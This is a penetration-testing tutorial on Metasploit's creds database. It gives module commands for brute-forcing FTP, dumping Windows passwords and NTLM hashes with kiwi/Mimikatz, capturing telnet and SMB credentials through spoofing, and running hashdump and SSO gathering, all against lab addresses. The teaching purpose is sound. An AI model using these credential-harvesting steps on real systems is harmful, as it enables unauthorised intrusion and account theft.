Categories

Archives

Penetration Testing

Metasploit for Pentester: Creds

This is in continuation with the Metasploit for Pentester series of articles that we are presenting.  More specifically we learned about the Workspaces and the Metasploit Database service in this article: Metasploit for Pentester: Database & Workspace. In this article, we will be discussing another database inside the Workspace that can be used by Penetration Testers: Creds.

Table of Content

  • Recap and DB Initialization
  • Introduction
  • Extracting Creds
    • From Bruteforce
    • From Mimikatz
    • From Telnet
    • From SMB
    • From Hashdump
    • From SSO
  • Search Filter
    • By Username
    • By Type
    • By Port
    • By Host
    • By Service
  • Adding Credentials
  • Exporting Credentials
  • Conclusion

Recap and DB Initialization

Without repeating but having a small recap of the facts that we learned in the Workspace article that, Metasploit has a Postgres SQL database at its disposal inside which Penetration Testers can create Workspace for their usage. This Workspace has some sub-sections such as the hosts and vulns that hold the various hosts enumerated by the users with the help of the db_nmap and Metasploit auxiliaries. Among those databases, we have another type of database that is called creds. Before beginning, with its functionalities, let’s initiate the database with the help of the following command.

msfdb init

Introduction

After initializing, just by running the creds command, we can see the table that will hold the data enumerated by the user. It contains the following columns: hosts for holding the primary key i.e., IP Addresses of the targeted hosts, the origin will store the location where we were able to grab the creds from, service will feature the particular service running on the hosts that made it possible to the extraction of the creds, public and private are just the holders for the public variable which in most cases is the username and private as you might have guessed it the password. We have some other columns that we will get into later. However, we have a column by the name of JtR Format. It will contain the format that can be used with John the Ripper tool to decode.

creds

Extracting Creds: Bruteforce

We discussed in the Introduction section that the creds table will populate with the correct credentials that we enumerate using the auxiliaries from Metasploit. To demonstrate the collection of creds from Bruteforce, we will be targeting the FTP service running on a server. We used the ftp_login exploit to attempt to Bruteforce the credentials. We provided the host with the User File with the possible usernames, pass a file with possible passwords. After running through, the list of usernames and passwords, the exploit was able to grab the correct credentials as username privs and password 123. After successful extraction of the credentials, we ran the creds command and we can observe that the creds table has its very first entry as demonstrated in the image below

use auxiliary/scanner/ftp/ftp_login
set rhosts 192.168.1.40
set user_file /root/users.txt
set pass_file /root/pass.txt
set verbose false
set stop_on_success true
exploit
creds

Extracting Creds: Mimikatz

We are not going to use the Mimikatz directly on our target but we will be using the Meterpreter external extension called kiwi. To use Mimikatz, we will be initially compromising a Windows Machine and gain a meterpreter session on it. After gaining the meterpreter, we will load the kiwi module and run the creds_all command to gain all the possible credentials. Passwords, hashes from the compromised machine. We can see that we can enumerate the NTLM hashes and some clear text passwords with the help of the kiwi module.  

load kiwi
creds_all

Let’s run the creds command again to see if the recently enumerated creds are populated inside the table. We can observe that we have the clear text password and the NTLM hashes added into the creds table. We can see that the host that we extracted the NTLM hash is the Windows Machine running with the IP Address of 192.168.1.21 and the FTP service was running on the machine with the IP Address 1922.168.1.40

Extracting Creds: Telnet

Moving on from the FTP service and the NTLM hashes, it’s time to extract some telnet credentials with the help of another Metasploit auxiliary called capture/telnet. We are targeting the machine with the IP Address of 192.168.1.3 and we can see that the captured credentials are ignited/123. As always running the creds command can confirm that the creds table is successfully populated with the Telnet credentials.

use auxiliary/server/capture/telnet
set srvhost 192.168.1.9
exploit
creds

Extracting Creds: SMB

Next, we will be targeting the Windows Machine with the SMB capture and generate the response to capture the NTLM hashes.  We will be using the auxiliary/server/capture/smb and auxiliary/spoof/nbns/nbns_response exploits to get the NTLM hashes. We provided the host for serving the capture and the path to the john password file to be saved. Also, we provided the spoof IP Address and we have the NTLM hashes as shown in the image below.

use auxiliary/server/capture/smb
set srvhost 192.168.1.9
set johnpwfile /root/Desktop
exploit
use auxiliary/spoof/nbns/nbns_response
set spoofip 192.168.1.9
set interface eth0
exploit

Since we were successful in capturing the NTLM hashes from the target machine, these will automatically populate the creds table. We can check these entries by running the creds command as shown in the image below.

Extracting Creds: Hashdump

Moving on from NTLM hashes on Windows to Hashes on Linux machines. To enumerate the hashes, we will be using the Hashdump post-exploitation module on Metasploit. After exploiting a Linux Machine, we can use this post-exploitation module to gather all the hashes of the users on the compromised machine. We can see from the image below that the extracted hashes have been added to the creds table.

use post/linux/gather/hashdump
set session 3
exploit

It is not always necessary to run the post-exploitation module as demonstrated above. Meterpreter has the command that we can directly from the meterpreter shell called hashdump. It lists all the extracted hashes as shown in the image.

hashdump

When we go back to the Creds database we can see that it will have the hashes recovered from the hashdump post-exploitation module and the hashdump meterpreter command that we just ran.

Extracting Creds: SSO

Next, we will be targeting the Domain Controlled Windows System and try to capture the SSO credentials programmed on it.  We will use the post-exploitation module windows/gather/credentials/sso. We can see from the image below that the SSO password for Nisha User was extracted successfully.

use post/windows/gather/credentials/sso
set session 1
exploit

Let’s check if the SSO credentials for Nisha users that we just extracted make their way into the Creds database. After running the creds command we can see that it contains the SSO credentials as well.

Search Filter: Username

While working with multiple targets across a dense network of machines, it becomes difficult to identify and search for a particular set of credentials. Creds have the option to sort the data according to your requirement. Starting with the basic filter of username. Identifying a set of credentials with the username is such a standard as lock and key. With the help of the -u option we can sort the creds table with a particular username. In the demonstration below we are searching for the credentials with the username raj.

creds -u raj

Search Filter: Type

The next search filter that we are going to explore is the searching by the type of credentials. To understand this, we need to understand the categorization that is employed by the creds to sort different types of credentials. When we enumerated the NTLM hashes it categorized itself as the NTLM type credentials. Hence, when we use the -t option with NTLM we can get all the captured hashes as shown in the image below.

creds -t ntlm

Search Filter: Port

Moving on from the type of credentials to the port from which the credential is extracted. We know that we can extract the credentials from a particular service. This service must be running on a specific port. To use that port number to sort through the creds table we can use the option -p followed by the port number that you want to use for searching for credentials. In the demonstration below, we are searching for credentials that are extracted from port 23.

creds -p 23

Search Filter: Host

The next search filter that we are going to explore is the searching by the host of credentials. These are hosts from which the credentials originated or the hosts from which the credentials are extracted.  When used the -O option with the IP Address of the hosts, it will list all the credentials that were extracted from that particular host as shown in the image below.

creds -O 192.168.1.136

Search Filter: Service

After sorting from various hosts, ports, types, and usernames at last we come to the filter where we can sort the credentials by service that they were extracted from. This is similar to the one that we did with the port. But as we know that it is not always necessary that the services are running on their default ports. Hence, targeting via the Service name is an optimal strategy.

creds -s ftp

Adding Credentials

We introduced some odd three-four methods to add the credentials into the creds table. But even if those are not sufficient and you want particular credentials in your database. You have the choice to add it manually. It requires the user tag and the password tag. In the demonstration below, we are adding the credentials for the user Pavan.

Exporting Credentials

As we discussed in the previous article about the hosts and workspace, we exported the contents of their database into a CSV file for reporting and other purposes. The Creds command is not untouched by this functionality. If you want to export the data from the Creds database into a CSV file, you can do so by using the -o option followed by the file name as shown below.

creds -o raj.csv

Conclusion

This was a learning experience as when we start with the Penetration Activities, we tend not to focus on the documentation process or providing you work a proper structure and backup. But with time and some incidents where lack of these qualities proves to be valuable. The Creds database functionality of Metasploit is not a new feature, it has been on for years and yet the general usage of these in real life seems very less. Hence, it inspired us to provide the guide, so that lots of Penetration Testers can use it and benefit from it.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on Twitter and LinkedIn